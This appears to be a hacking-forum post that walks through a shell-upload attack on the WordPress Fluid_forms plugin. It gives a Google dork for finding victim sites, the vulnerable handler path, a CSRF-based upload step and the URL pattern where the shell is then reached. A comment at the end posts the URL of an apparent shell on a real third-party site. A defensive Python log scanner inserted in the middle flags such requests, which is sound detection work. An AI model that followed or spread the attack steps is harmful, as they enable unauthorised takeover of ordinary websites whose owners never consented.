Hello Fans,
today's article is on the WordPress Fluid_forms upload vulnerability
exploit.
#Type: CSRF & Xampp, Uploadify
#Tested: Windows XP, 7, 8, BackBox
#CMS: WordPress
NOW LET'S MOVE ON
Dork: inurl:fluid_forms or inurl:"/wp-content/plugins/fluid_forms/file-upload/"
Exploit: /wp-content/plugins/fluid_forms/file-upload/server/php/
Search the dork in Google, select a target, then enter the Exploit.
Example:
site.com/wp-content/plugins/fluid_forms/file-upload/server/php/
If vulnerable, it will display "files []".
CSRF
Replace www.site.com with your target site, then save the CSRF script as an .html file, e.g. md.html, and upload your shell.
Shell Access: /wp-content/plugins/fluid_forms/file-upload/server/php/files/shellname.php
That's all. If you don't understand, contact me or comment below...
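On the defending side, the handler path and the files/ directory named above are the two things to look for in web server access logs. The script below is an added example, not part of the original post: it flags requests to the upload handler and requests for script-type files under files/. It assumes the Apache/nginx combined log format; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# The two paths come from the article; log format and names are assumptions.
HANDLER = "/wp-content/plugins/fluid_forms/file-upload/server/php/"
UPLOADS = HANDLER + "files/"
# Extensions a PHP-enabled server may execute, including "x.php.jpg" style names.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)")
# Apache/nginx "combined" access log line.
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                  r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def normalise(target):
    """Drop the query string, decode %xx, collapse '//' and lower-case."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/+", "/", path).lower()

def classify(line):
    """Return (ip, finding) for a request worth investigating, else None."""
    m = LINE.match(line)
    if not m:
        return None
    path, method, status = normalise(m["target"]), m["method"], m["status"]
    if path.startswith(UPLOADS):
        if SCRIPT_EXT.search(path[len(UPLOADS):]):
            return m["ip"], ("script-served" if status == "200" else "script-requested")
        return None  # ordinary uploaded file (image, document)
    if path.rstrip("/") + "/" == HANDLER or path == HANDLER + "index.php":
        if method == "POST":
            return m["ip"], "upload-attempt"
        if status == "200":
            return m["ip"], "handler-exposed"
    return None

def scan(lines):
    """Classify every line and keep only the findings, in log order."""
    return [hit for hit in map(classify, lines) if hit]

def sample_row(ip, method, target, status):
    """Build one constructed log line in combined format."""
    return (f'{ip} - - [10/Mar/2024:10:00:00 +0000] "{method} {target} HTTP/1.1" '
            f'{status} 128 "-" "Mozilla/5.0"')

# Constructed sample traffic (documentation IP ranges), not real logs.
SAMPLE_LOG = [
    sample_row("198.51.100.7", "GET", HANDLER, 200),
    sample_row("198.51.100.7", "POST", HANDLER, 200),
    sample_row("198.51.100.7", "GET", "/wp-content/plugins//fluid_forms/file-upload/server/php/files/Example.PHP?x=1", 200),
    sample_row("192.0.2.10", "GET", UPLOADS + "photo.jpg", 200),
    sample_row("192.0.2.10", "GET", "/index.php", 200),
]
```

A "script-served" finding means a script-type file under files/ answered with HTTP 200, which is the case to triage first.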
http://www.rogeliogarciaabogado.com/wp-content/plugins/fluid_forms/file-upload/server/php/files/b7k.php
not working